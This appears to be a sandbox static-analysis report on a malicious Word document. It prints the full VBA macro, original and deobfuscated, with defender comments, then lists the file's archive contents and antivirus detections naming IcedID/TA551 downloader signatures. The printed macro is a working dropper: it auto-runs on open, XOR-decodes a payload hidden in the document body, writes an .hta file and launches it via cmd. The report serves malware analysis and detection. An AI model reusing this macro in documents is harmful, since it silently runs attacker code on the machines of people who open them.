Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
                        ' Auto-run entry point. Word calls Document_Open in ThisDocument when the file is
                        ' opened with macros enabled, so the chain below starts without further user action.
                        Sub Document_Open()
                        ' Len("countBoolean") is the constant 12, so this condition is always true.
                        ' It is filler that makes the unconditional call to main look like a real check.
                        If Len("countBoolean") > 0 Then
                                main
                        End If
                        End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
                        ' Auto-run entry point: runs on document open once macros are enabled.
                        Sub Document_Open()
                        ' Always-true guard (Len of a 12-character literal); main is called on every open.
                        If Len("countBoolean") > 0 Then
                                main
                        End If
                        End Sub

                                    

Original


                                        Attribute VB_Name = "cHLib"
' Module cHLib: delimiter, path-building, decoding and execution helpers.

' Returns the "!" character that is used as the field delimiter for the document body.
Function curBoolButt()
curBoolButt = "!"
End Function
' Thin wrapper around Split: returns iLink broken into an array on delWindow.
Function btnTableReq(iLink, delWindow)
btnTableReq = Split(iLink, delWindow)
End Function
' Execution stage. The iLink parameter is never read and no return value is assigned.
' The string handed to Shell concatenates to
'   c:\windows\system32\cmd /c c:\programdata\refArrB.hta
' so cmd opens the dropped file through its file association (mshta.exe on a default
' Windows install -- confirm on the analysed host).
' Defender view: an Office process spawning cmd.exe with an .hta path under C:\ProgramData
' is the observable here; the ASR rule "Block all Office applications from creating child
' processes" stops this step.
Function cntBefore(iLink)
Shell collectionCurrency("c:\windows\system32\cmd /c ")
End Function
' Builds iLink & lName & valMainObj & procConst. With the defaults this is
' iLink & "c:\programdata\refArrB.hta". The extension is assembled from ".h" + "t" + "a",
' so the literal ".hta" never appears in the macro source (presumably to defeat simple
' string matching). The "" in the middle of the expression contributes nothing.
Function collectionCurrency(iLink, Optional lName = "c:\programdata\refArrB.h", Optional valMainObj = "t", Optional procConst = "a")
collectionCurrency = iLink & lName & "" & valMainObj & procConst
End Function
' Decoder: turns an array of numeric fields into a string by XOR-ing each value with 110.
' - The result starts with vbNullChar, so the decoded text is preceded by one NUL character.
' - The loop starts at index 1, so element 0 of swapRem is skipped.
' - booleanStructTable and oCnt are undeclared (implicit Variants); each array element is
'   coerced to a number by the Xor operator.
' For static triage the same transform (split on "!", drop field 0, value Xor 110) recovers
' the dropped file's content without running the macro.
Function selBoxCurr(swapRem As Variant)
Dim pointBoxByte As String
pointBoxByte = vbNullChar
booleanStructTable = UBound(swapRem)
For oCnt = 1 To booleanStructTable
pointBoxByte = pointBoxByte & Chr(swapRem(oCnt) Xor 110)
Next
selBoxCurr = pointBoxByte
End Function

                                    

Deobfuscated


                                        Attribute VB_Name = "cHLib"
' Module cHLib: helpers for the delimiter, the drop path, payload decoding and execution.

' Field delimiter for the encoded document body: "!".
Function curBoolButt()
curBoolButt = "!"
End Function
' Split wrapper: iLink is the text, delWindow the delimiter.
Function btnTableReq(iLink, delWindow)
btnTableReq = Split(iLink, delWindow)
End Function
' Launches the dropped file. iLink is ignored; Shell receives
' "c:\windows\system32\cmd /c c:\programdata\refArrB.hta".
' Indicator for detection: WINWORD.EXE -> cmd.exe with that command line.
Function cntBefore(iLink)
Shell collectionCurrency("c:\windows\system32\cmd /c ")
End Function
' Concatenates the caller's prefix with the drop path. The defaults join to
' "c:\programdata\refArrB.hta"; the extension is split across three parameters so that
' ".hta" is not present as a single literal.
Function collectionCurrency(iLink, Optional lName = "c:\programdata\refArrB.h", Optional valMainObj = "t", Optional procConst = "a")
collectionCurrency = iLink & lName & "" & valMainObj & procConst
End Function
' Single-byte XOR decoder (key 110). Output begins with vbNullChar, then one character per
' array element from index 1 to UBound; element 0 is not used.
Function selBoxCurr(swapRem As Variant)
Dim pointBoxByte As String
pointBoxByte = vbNullChar
booleanStructTable = UBound(swapRem)
For oCnt = 1 To booleanStructTable
' Xor coerces the field to a number; Chr maps the result back to a character.
pointBoxByte = pointBoxByte & Chr(swapRem(oCnt) Xor 110)
Next
selBoxCurr = pointBoxByte
End Function

                                    

Original


                                        Attribute VB_Name = "copyRef"
' Orchestrates the two stages in order: listValButt writes the decoded payload to
' c:\programdata\refArrB.hta, then cntBefore runs it through cmd /c.
Sub main()
listValButt
' cntBefore assigns no return value, so repoSingle only receives Empty; the assignment
' and the "" argument are filler around the call.
repoSingle = cntBefore("")
End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "copyRef"
' Drop-then-execute driver: stage 1 writes the file, stage 2 starts it.
Sub main()
listValButt
' The value stored in repoSingle is never used; only the side effect of cntBefore matters.
repoSingle = cntBefore("")
End Sub

                                    

Original


                                        Attribute VB_Name = "ctrlLinkCls"
' Module ctrlLinkCls: reads the encoded payload from the document body and drops it to disk.

' Drop stage. collectionCurrency("") evaluates to "c:\programdata\refArrB.hta" (empty prefix
' plus the default path parts). "For Output" creates the file or truncates an existing one;
' Print # writes the decoded string followed by a line break.
' Defender view: an Office process creating an .hta file under C:\ProgramData is a
' file-creation event worth alerting on.
Sub listValButt()
Open collectionCurrency("") For Output As #1
Print #1, selBoxCurr(leftIndexCls)
Close #1
End Sub
' Splits vHeader on the "!" delimiter returned by curBoolButt.
Function optionSel(vHeader)
optionSel = btnTableReq(vHeader, curBoolButt)
End Function
' Supplies the document body as the data source: the encoded payload is stored in the
' document text, not in the macro code, so reviewing the VBA alone does not reveal it.
' ActiveDocument.Content is a Range; presumably its default Text property is what Split
' receives -- confirm if reproducing the decode offline.
Function leftIndexCls()
leftIndexCls = optionSel(ActiveDocument.Content)
End Function

                                    

Deobfuscated


                                        Attribute VB_Name = "ctrlLinkCls"
' Module ctrlLinkCls: payload extraction from the document body and file drop.

' Writes the XOR-decoded body to c:\programdata\refArrB.hta via file number #1
' (opened For Output, so any existing file at that path is overwritten).
Sub listValButt()
Open collectionCurrency("") For Output As #1
Print #1, selBoxCurr(leftIndexCls)
Close #1
End Sub
' Returns vHeader split into fields on "!".
Function optionSel(vHeader)
optionSel = btnTableReq(vHeader, curBoolButt)
End Function
' Returns the "!"-separated fields of the active document's content; these fields are the
' encoded payload that selBoxCurr decodes.
Function leftIndexCls()
leftIndexCls = optionSel(ActiveDocument.Content)
End Function

                                    
[Content_Types].xml
_rels/.rels
word/_rels/document.xml.rels
!uCP$V
word/document.xml
^VWuU-OBr?_
hz'huh7
K8D!M:
Q`\=";
qd30;&"
~BUdK:
UpFb4
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/vbaProject.bin
Cs 1VZ,
!%RtF
Lv$w'SF_
wi}P2K
nU#J't T
7,geE}
#Dn6#z
6}oj:%
g3NIVQ
c!)SkU
x0d A{
word/media/image1.png
&iCCPAdobe RGB (1998)
c``2ptqre
> v^~^*
iTXtXML:com.adobe.xmp
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164648, 2021/01/12-15:52:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop 22.2 (Windows)" xmp:CreateDate="2021-04-07T20:22:11+03:00" xmp:ModifyDate="2021-06-29T08:26:02+03:00" xmp:MetadataDate="2021-06-29T08:26:02+03:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="Adobe RGB (1998)" xmpMM:InstanceID="xmp.iid:a46d9cbe-aa56-1448-ae13-893886062a23" xmpMM:DocumentID="adobe:docid:photoshop:1953df80-6432-0144-9
CzE:((R
fvUFmN
]\)=
[u8J6\
tSu9gq
.vY$0X
kqb>&o1
S<6m/5
.i8{0m=
kb?G=}
#/\ _~
2]Z{)t
AvQ)MN
Ko'60l
0e(x_I#
=<QB`nk
y)mA?-
0M]\lAw
*UAO[&l
MY2W7w
aul\92
iSvtYO:fy
87rA7eQ
=i]{%
<|WAO*i
word/theme/theme1.xml
iN 5/m
_O<8=
&r-DeI
word/settings.xml
?BcH5C
word/vbaData.xml
,W"Cg4
[N;X_'f
customXml/_rels/item1.xml.rels
customXml/itemProps1.xml
customXml/item1.xml
TZ';c0
docProps/app.xml
word/styles.xml
JDb04%f
1y18:Z
Lz<%9I
U!%'b}
*5.[rK
*5.[rK
*5.[rK
word/fontTable.xml
d/=(g+
qxs6F
word/webSettings.xml
f\US}d
,y0|yh}
docProps/core.xml
%GN[`l
3)RTX@
^8e1\b
[Content_Types].xmlPK
_rels/.relsPK
word/_rels/document.xml.relsPK
word/document.xmlPK
word/_rels/vbaProject.bin.relsPK
word/vbaProject.binPK
word/media/image1.pngPK
word/theme/theme1.xmlPK
word/settings.xmlPK
word/vbaData.xmlPK
customXml/_rels/item1.xml.relsPK
customXml/itemProps1.xmlPK
customXml/item1.xmlPK
docProps/app.xmlPK
word/styles.xmlPK
word/fontTable.xmlPK
word/webSettings.xmlPK
docProps/core.xmlPK
Antivirus Signature
Bkav Clean
Lionic Trojan.MSOffice.SAgent.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.37168600
FireEye Trojan.GenericKD.37168600
CAT-QuickHeal Clean
ALYac Trojan.Downloader.DOC.Gen
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
Trustlook Clean
BitDefender Trojan.GenericKD.37168600
K7GW Clean
K7AntiVirus Clean
BitDefenderTheta Clean
Cyren Trojan.COYW-7
Symantec Trojan.Gen.NPE
ESET-NOD32 a variant of VBA/TrojanDropper.Agent.CAV
Baidu Clean
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
ClamAV Clean
Kaspersky UDS:DangerousObject.Multi.Generic
Alibaba TrojanDownloader:VBA/MalDoc.ali1000101
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot Clean
Rising Clean
Ad-Aware Trojan.GenericKD.37168600
Emsisoft Trojan.GenericKD.37168600 (B)
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Downloader.pc
CMC Clean
Sophos Clean
SentinelOne Static AI - Malicious OPENXML
GData Trojan.GenericKD.37168600
Jiangmin Clean
Avira W2000M/Agent.2798516
MAX malware (ai score=83)
Antiy-AVL Clean
Kingsoft Clean
Microsoft TrojanDownloader:O97M/IcedID.RVO!MTB
Gridinsoft Clean
Arcabit HEUR.VBA.Trojan.d
SUPERAntiSpyware Clean
ZoneAlarm Clean
Avast-Mobile Clean
Cynet Malicious (score: 99)
AhnLab-V3 Downloader/DOC.TA551
Acronis Clean
McAfee W97M/Downloader.dkf
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Trojan.VBA.Agent
MaxSecure Clean
Fortinet VBA/Agent.DFK!tr.dldr
AVG Other:Malware-gen [Trj]
Panda Clean
Qihoo-360 virus.office.qexvmc.1070
No IRMA results available.